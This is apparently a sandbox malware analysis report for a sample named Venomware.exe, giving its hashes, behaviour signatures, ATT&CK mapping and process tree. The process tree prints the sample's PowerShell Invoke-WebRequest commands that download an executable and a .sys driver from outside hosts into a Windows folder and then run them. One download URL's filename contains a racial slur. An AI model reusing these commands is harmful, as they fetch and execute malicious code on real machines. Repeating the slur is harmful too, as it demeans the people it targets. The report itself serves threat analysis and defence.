ec71ea6cde9185036500ecac3288719ef51869973b2f78d9c00dbc037d632025

General

Target

Venomware.exe
Size

291KB
MD5

d28d5caa7c1035110471b76346775f06
SHA1

0e94a75f4eb1d9402252f252a4812ed909378e5f
SHA256

ec71ea6cde9185036500ecac3288719ef51869973b2f78d9c00dbc037d632025
SHA512

99d198fb755159e657234d70f3a6f543ed9d562802b99a1e2609e12cb6006dfe9fbdc0701d2efcd61662b5dcdb58eb26cef128159bb17c8388a06f63e7ea3544
SSDEEP

6144:O0OaVh587gEJ/CmJjVDM7OohDU8iAhpZo8/xGqBhM3ne5fFMU:O0jApKmlqRD3iAhWr3ne5fl

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
19	2104	powershell.exe
21	2104	powershell.exe
25	2084	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
2104	powershell.exe
2084	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 1 IoCs

pid	Process
3424	M.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\GameBarPresenceWriter\M.exe	powershell.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2104	powershell.exe
2104	powershell.exe
2084	powershell.exe
2084	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2104	powershell.exe
Token: SeDebugPrivilege	2084	powershell.exe

Suspicious use of WriteProcessMemory 14 IoCs

description	pid	Process	procid_target
PID 4596 wrote to memory of 116	4596	Venomware.exe	88
PID 4596 wrote to memory of 116	4596	Venomware.exe	88
PID 116 wrote to memory of 2104	116	cmd.exe	89
PID 116 wrote to memory of 2104	116	cmd.exe	89
PID 4596 wrote to memory of 5108	4596	Venomware.exe	90
PID 4596 wrote to memory of 5108	4596	Venomware.exe	90
PID 5108 wrote to memory of 2084	5108	cmd.exe	91
PID 5108 wrote to memory of 2084	5108	cmd.exe	91
PID 4596 wrote to memory of 3160	4596	Venomware.exe	92
PID 4596 wrote to memory of 3160	4596	Venomware.exe	92
PID 3160 wrote to memory of 3424	3160	cmd.exe	93
PID 3160 wrote to memory of 3424	3160	cmd.exe	93
PID 4596 wrote to memory of 624	4596	Venomware.exe	94
PID 4596 wrote to memory of 624	4596	Venomware.exe	94

C:\Users\Admin\AppData\Local\Temp\Venomware.exe
"C:\Users\Admin\AppData\Local\Temp\Venomware.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4596
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri https://cdn.zerocdn.com/687123071/niggermapper.exe -OutFile C:\Windows\GameBarPresenceWriter\M.exe" >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:116
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri https://cdn.zerocdn.com/687123071/niggermapper.exe -OutFile C:\Windows\GameBarPresenceWriter\M.exe"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2104
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri https://files.catbox.moe/54vck6.sys -OutFile C:\Windows\GameBarPresenceWriter\gdx.sys" >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5108
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri https://files.catbox.moe/54vck6.sys -OutFile C:\Windows\GameBarPresenceWriter\gdx.sys"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2084
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\GameBarPresenceWriter\M.exe C:\Windows\GameBarPresenceWriter\gdx.sys >nul
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3160
- - C:\Windows\GameBarPresenceWriter\M.exe
    C:\Windows\GameBarPresenceWriter\M.exe C:\Windows\GameBarPresenceWriter\gdx.sys
    3⤵
    - Executes dropped EXE
    PID:3424
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:624

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
49e7d5f2a296b59afec08bc314bed998

SHA1
7f898bf195ffd46ce2d19fad0ce33155f6e47f5f

SHA256
394832dfefa5e2e6204b60708a2ca33bb9d2f529664419bc050975f4b80faefe

SHA512
f64579fdac0bfebad4c20ad575b8ea45136e295fba950da4cbf84402228a3897b2e2deb4eb4605deb5df93321b1dc15c8a878da36016d7e5e060182142fdf839

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
9a482cd2b43b41bc52efcf09412ae0d2

SHA1
b37c6c1a4fd982535552e6cc379b3377eed6447e

SHA256
ff53fe75c22e2e0bc680d6da524e0e53c56046c278f89b240eb1ce008cee6b9d

SHA512
70b92a9e26c2548bdeac5ff9f0b25528c9368c786cb0e569bfbb50af9c6c069dee731a80991569cbf304651a34d11189a77b01cfed2275110bf12e7083d5c808

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5i4j2r5r.ixf.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\GameBarPresenceWriter\M.exe

Filesize
141KB

MD5
a1cfca039f5ae7d52c161e70a8dd9078

SHA1
98df9fb5492caa0f4aa6ae7095a4e3a5d3a13bb4

SHA256
1177ce5152564d3075199f443f12518a26ef5dbf291b38ad3f0582bd604b384f

SHA512
775452778949a9b438cfc21e6d7203a38b7d9dfa19b4c49268c9f29bcab23f8dae2ec1f8276b56481ad03db667795f1158bebc1faf893f567421f7d842b34168

Download Submit
memory/2104-0-0x00007FFCEDB23000-0x00007FFCEDB25000-memory.dmp

Filesize
8KB

Download
memory/2104-10-0x000002277D860000-0x000002277D882000-memory.dmp

Filesize
136KB

Download
memory/2104-11-0x00007FFCEDB20000-0x00007FFCEE5E1000-memory.dmp

Filesize
10.8MB

Download
memory/2104-12-0x00007FFCEDB20000-0x00007FFCEE5E1000-memory.dmp

Filesize
10.8MB

Download
memory/2104-16-0x00007FFCEDB20000-0x00007FFCEE5E1000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing